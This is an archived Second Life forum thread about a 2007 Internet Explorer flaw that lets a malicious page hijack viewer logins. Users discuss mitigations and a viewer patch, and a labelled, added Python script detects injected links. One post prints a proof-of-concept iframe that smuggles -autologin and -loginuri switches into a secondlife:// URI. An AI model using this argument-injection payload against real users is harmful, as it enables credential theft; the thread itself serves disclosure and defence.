Welcome to the Second Life Forums Archive


IE (Internet Explorer) pwns SecondLife ?

Dytska Vieria
+/- .00004™
Join date: 13 Dec 2006
Posts: 768
09-17-2007 08:51
This was announced very recently:

http://www.securityfocus.com/archive/1/479698

"Attackers can steal the victim's login credentials, therefore hijacking their virtual persona, by simply tricking them into visiting a malicious Web page"
_____________________
+/- 0.00004
Kirah Hastings
Registered User
Join date: 8 Sep 2007
Posts: 5
09-17-2007 09:29
OK, so I read this article... Now, how does one go about protecting oneself from this exploit, please? What all can be done to ward this off other than the obvious of not giving your password to anyone, changing it monthly, etc.? Please be specific, and thanks ;)
Asriazh Frye
Smart Cookie
Join date: 30 Sep 2006
Posts: 173
09-17-2007 10:15
So, the obvious would be to use Firefox or another Mozilla-based browser. I just tried the exploit and got:

Firefox doesn't know how to open this address, because the protocol (secondlife) isn't associated with any program.

Even if you use IE you should be fine if you also use Vista, since it should ask you if it's OK to open the secondlife client.
I can't try out what happens on Win XP, since I don't have it installed. But if you want to try out what happens in a safe environment, open Notepad or whatever, paste in this

<html>
<head>
<title>Example 1</title>
</head>
<body bgcolor="#FFFFFF" text="#000000">
<iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>
</body>
</html>


and save it as "login-exploit.html" for example.
When you try to open this newly created page with IE, it will try to open the SL client and connect to your nonexistent PHP server... or maybe not. You'll have to try this out yourself. But again, it's a totally safe way to try out what actually would happen.

What might try to stop this exploit is (if you decide to stick with IE):
-Adding "secondlife://" to the list of blocked sites on IE
-Not using the auto save password feature of the SL client

-Asriazh

edit:
Grrr, the vbcode is messing with the HTML code I posted here, adding its stuff to it, even if I switch "automatically parse links in text" off :p
Ah, fixed ^^
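
Added example (not part of the original post or of any Linden Lab code): a small Python audit that scans HTML for `secondlife:` links carrying the injection markers shown in the page above, namely a double quote or the `-autologin` / `-loginuri` switches. The names `injected_parts`, `HandlerLinkAuditor` and `audit_html` are hypothetical, percent-decoding before the check is a conservative assumption, and the sample markup is constructed.

```python
from html.parser import HTMLParser
from urllib.parse import unquote

# Viewer switches named in this thread; extend for your own audit.
RISKY_SWITCHES = ("-autologin", "-loginuri")
URL_ATTRS = {"src", "href", "action", "data"}


def injected_parts(uri):
    """Return reasons a secondlife: URI looks like argument injection."""
    if not uri.strip().lower().startswith("secondlife:"):
        return []
    decoded = unquote(uri)  # assumption: treat %22 / %20 like raw characters
    reasons = []
    if '"' in decoded:
        reasons.append("double quote can close the handler's quoted argument")
    lowered = decoded.lower()
    for switch in RISKY_SWITCHES:
        if switch in lowered:
            reasons.append("viewer switch " + switch)
    return reasons


class HandlerLinkAuditor(HTMLParser):
    """Collects (tag, attribute, uri, reasons) for suspicious links."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                reasons = injected_parts(value)
                if reasons:
                    self.findings.append((tag, name, value, reasons))


def audit_html(markup):
    auditor = HandlerLinkAuditor()
    auditor.feed(markup)
    auditor.close()
    return auditor.findings


# Constructed sample: the iframe from the post plus an ordinary location link.
SAMPLE = """<html><body>
<iframe src='secondlife://" -autologin -loginuri "http://localhost/login.php'></iframe>
<a href="secondlife://Ahern/128/128/30">Teleport</a>
</body></html>"""
```

`audit_html(SAMPLE)` reports only the iframe; the plain location link passes because it contains neither a quote nor a viewer switch.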
Jotheph Nemeth
Registered User
Join date: 9 Aug 2007
Posts: 142
09-17-2007 15:41
How do you add secondlife:// as a blocked site to IE?

As far as I know, all you can do is add sites to block cookies.
Element Smirnov
Registered User
Join date: 13 Oct 2006
Posts: 108
09-17-2007 21:41
You can use Maxthon (runs the IE core) or Opera to block ads and URLs. I use Opera as my primary browser and Maxthon when I need IE compatibility. Maxthon is what Internet Explorer should be, like IE on steroids. Opera is what they all should be.
http://www.maxthon.com/
http://www.opera.com/
Don't start with the Firefox fanboy stuff ;)
I never really liked Firefox, but I think it's good.
Jonash Vanalten
Registered User
Join date: 26 Nov 2006
Posts: 2
Patch for windows viewer 1.18.2.0
09-18-2007 12:23
I didn't want to wait for an updated viewer from Linden so I produced a binary patch for the Windows viewer.

I've attached it to the JIRA entry. http://jira.secondlife.com/browse/VWR-2508

This should prevent the exploit working as it disables the -loginuri feature.